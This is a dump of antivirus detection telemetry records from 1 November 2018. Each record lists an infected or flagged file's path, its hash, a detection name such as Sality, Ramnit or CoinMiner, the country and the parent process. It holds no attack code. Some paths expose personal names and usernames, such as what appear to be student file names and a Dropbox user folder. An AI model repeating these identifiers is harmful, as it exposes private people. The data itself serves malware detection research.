  Row(detection=Row(filename='postmig.exe', filepath='D:\\Backups\\Contmac\\drive\\Fiscal_Contmac\\OUTROS\\SysWOW64\\migwiz\\PostMig.exe', filesize=640000, name='W32/Stanit.#M1.#R1'), hash='c7cd3eab885a5d4701bb5e346d1e27883593b7930c4e33e1959b3d36d9f415d4', metadata=Row(cmdline='\\\\\\\\\\\\\\\\CONTPARTNER-BKP\\\\\\\\BKP_Completo\\\\\\\\ D:\\\\\\\\Backups\\\\\\\\ \\\\\\/MIR \\\\\\/R:2 \\\\\\/W:2', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\Robocopy.exe', parentsize=98816, timestamp='2018-11-01T16:33:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[5].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[5].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215356-210ee935', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_632bd233\\AVSCAN-20181101-214038-A3F4827E\\AVSCAN-20181101-215356-210EE935', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='5eeb9ad2e0ac357eeb6617b2af46cbd4509259c0e6bdd5c2d85896b931928fc0', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:53:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aamlauncher.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\UWA\\AAMLauncher.exe', filesize=524000, name='W32/Sality.AT.#M1.#R1'), hash='8f626bad937d36004040208af471b0e635dcfc231f9b14b2b2e0ee93b029f218', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T01:59:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[9].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[9].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:26:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110242-35c2f88d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68ba5657\\AVSCAN-20181101-110204-2F20D71F\\AVSCAN-20181101-110242-35C2F88D', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:02:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='researchdownload.exe', filepath='g:\\ســــــــــــــــــــــــــوفـت\\فلاشات\\سامـــــــونج\\e1205t\\spt\\e2105y by hosam kashto\\e2105y by hosam kashto\\flash arabic turkey\\bin\\ResearchDownload.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='761a47c48a643614c2922c5a7809c64dd06d7caaddc45e060ae9b684506688d1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T21:57:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fpupdate.exe', filepath='\\?\\J:\\Medal of honor\\FPUPDATE.EXE', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='8364e39ef8eb8ecf08a16f34a0c8d0984a5bb2c19dcb611f257e962abc2a2dcf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111040-f841eb6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111040-F841EB6D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:10:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='new9ant091i.htm', filepath='C:\\Windows.old\\Users\\CP\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\LEU43SUA\\new9ANT091I.htm', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='88a03271b84e4c8ba1f02e90e45ee298736ce610765a9c68fa9235c35624984a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T17:32:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\BetwaypokerMPP\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Microgaming\\Poker\\BetwaypokerMPP\\mppoker.exe', parentsize=1214712, timestamp='2018-11-01T17:40:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsn5CEA.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T12:55:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hpasset.exe', filepath='C:\\Program Files\\Hewlett-Packard\\HP Health Check\\HPAsset\\HPAsset.exe', filesize=3952000, name='W32/Sality.AT.#M1.#R1'), hash='7fe6a23a62ec9dca8f893ca85d6576b58791eaf8da7ae450fb65f3168fb81e74', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:gWODU1xBt0SvMzGG.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=114408, timestamp='2018-11-01T03:11:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='memurepair.exe', filepath='D:\\Program Files\\Microvirt\\MEmu\\MEmuRepair.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='5fe26051a2da329acdfbc8620014ebe8fbdcd7f91a831708732f648323684761', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Alwil Software\\Avast5\\AvastSvc.exe', parentsize=40384, timestamp='2018-11-01T07:18:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T11:44:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134050-2903cd2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b420a3bc\\AVSCAN-20181101-134001-1EB86EA1\\AVSCAN-20181101-134050-2903CD2B', filesize=512000, name='TR/RedCap.c32945.#M1.#R1'), hash='c329456623265a3676200f3b521b2c82fbd504cb49f8487bb72520d5edfddc15', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:39:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:17:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0652b91574e6288ba8632c1bf27862cfb1413327130f3aa31bd2f6d86211a9a4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\0652B91574E6288BA8632C1BF27862CFB1413327130F3AA31BD2F6D86211A9A4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0652b91574e6288ba8632c1bf27862cfb1413327130f3aa31bd2f6d86211a9a4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:12:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gsetup.exe', filepath='F:\\GSETUP.EXE', filesize=64000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='458c26afcba02300e4931e09b6a62c95c05740eafb75cb12e708e17dfb2e00f4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T09:10:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bhctrl32.exe', filepath='C:\\Program Files (x86)\\Bonjoiur Host Controller\\bhctrl32.exe', filesize=256000, name='RKit/Agent.marf.#M1.#R1'), hash='829ff334cdcfe87bbe5780fb8e696d8fa45420845c6d50dd1d29d0d2ead41b2a', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T09:23:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Integrated Clock Controller Service\\uninstall\\Setup.exe', filesize=2560000, name='W32/Sality.AT.#M1.#R1'), hash='1204fe2b25a9aa16c3c9624329e864138eed174ec43a293120618178ce1ae850', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:16:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191209-99060e02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_92c613cc\\AVSCAN-20181101-184433-789CA837\\AVSCAN-20181101-191209-99060E02', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:12:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apple.pif', filepath='F:\\New folder\\Corel Draw 12\\Apple\\Apple.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fonet.lis.dll', filepath='C:\\FONETHBYS\\Fonet.LIS.dll', filesize=2560000, name='HEUR/AGEN.1019132.#M1.#R1'), hash='1fac15e2659edc60380f65853620950956d1ecbd88eb670c47ff4db36edb6bbb', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:25:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='getdatantfs.exe', filepath='K:\\HBCD\\Programs\\GETDATANTFS.EXE', filesize=64000, name='TR/Siggen.64000.4.#M1.#R1'), hash='1a0201670260af68cb64af6267548b81214dc43129bf9e200edad39000c22236', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sheet001.htm', filepath='i:\\2016\\skoring penilaian kinerja tw iii_files\\sheet001.htm', filesize=176000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='83b76da691e636406e3c4c0fa4e7bcc49012feffcad1201b166eff8c8d1a6d0a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T02:04:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='82328d433ee97f0d79fbd6a58eb466952b724abcffc56a5373e431cc454f635c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\82328D433EE97F0D79FBD6A58EB466952B724ABCFFC56A5373E431CC454F635C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='82328d433ee97f0d79fbd6a58eb466952b724abcffc56a5373e431cc454f635c', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:53:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194020-2c2c5669', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9092216\\AVSCAN-20181101-193012-D2D37765\\AVSCAN-20181101-194020-2C2C5669', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:40:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:03:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.339\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.339\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T23:48:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T04:11:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00092104', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp00092104', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:46:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3663cb1c8b56cf6318e8f626b4b9daada3aee03dd75f7fc09a259a28627e9a58', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\3663CB1C8B56CF6318E8F626B4B9DAADA3AEE03DD75F7FC09A259A28627E9A58', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3663cb1c8b56cf6318e8f626b4b9daada3aee03dd75f7fc09a259a28627e9a58', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:00:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:07:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002517-4aa1474f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002517-4AA1474F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='coreldrw.pif', filepath='F:\\New folder\\coreldrw\\coreldrw.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003342-670dbf82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-235744-2DA07E8C\\AVSCAN-20181102-003342-670DBF82', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:33:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='f:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T14:53:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='#new hack ghost wolf v1.0.3[vip].vir', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.564\\#New Hack Ghost Wolf V1.0.3[VIP].VIR', filesize=2048000, name='TR/RedCap.gblsf.#M1.#R1'), hash='850d55400b4b6ec3ddcf70a5fae5cbff91c81b8dcf9fff2bc47717cf99dbba48', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T16:40:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165859-6f3b5f1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1ac18dc6\\AVSCAN-20181101-165844-6C2F264E\\AVSCAN-20181101-165859-6F3B5F1D', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:59:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vitari cristina.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\VITARI CRISTINA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:29:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151240-1e0613c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151240-1E0613C8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:12:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='privacy', filepath='/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='14', os_vminor='5', parentproc=None, parentsize=None, timestamp='2018-11-01T16:43:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rjco2so', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RJCO2SO', filesize=64000, name='VBA/Dldr.Agent.eozfz.#M1.#R1'), hash='8fb99a6889b86a9f75de34c20a8bde0eb6c9632475cfae64a436de7a5f37f5f0', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T17:32:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pp.exe', filepath='pp.exe', filesize=0, name='WORM/RunOnce.B2.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T10:54:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094125-30cddcd5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_48050d0a\\AVSCAN-20181101-094108-2EA412EE\\AVSCAN-20181101-094125-30CDDCD5', filesize=256000, name='TR/Qadars.DV.#M1.#R1'), hash='bda35141854d6ab62fe8bac8c978b01b9249fc6486e7ce76a43363dee1a6d294', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:41:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rthdvcpl.exe', filepath='C:\\Program Files\\Realtek\\Audio\\HDA\\RtHDVCpl.exe', filesize=15008000, name='W32/Sality.AT.#M1.#R1'), hash='b0816e4a9c8e23fd70960351480165780d57a68aadf4b5368008e2b52bc2cd34', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\msconfig.exe', parentsize=233984, timestamp='2018-11-01T17:08:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='turco pierluigi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\TURCO PIERLUIGI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:29:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151840-62f93a78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151840-62F93A78', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:18:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094817-2abd504c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094817-2ABD504C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:48:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215146-57c9b5cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c5b96b73\\AVSCAN-20181101-214916-44D8CEAA\\AVSCAN-20181101-215146-57C9B5CC', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T20:51:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150635-d81c4bad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150635-D81C4BAD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:06:42Z'), dt=datetime.date(2018, 11, 1)),
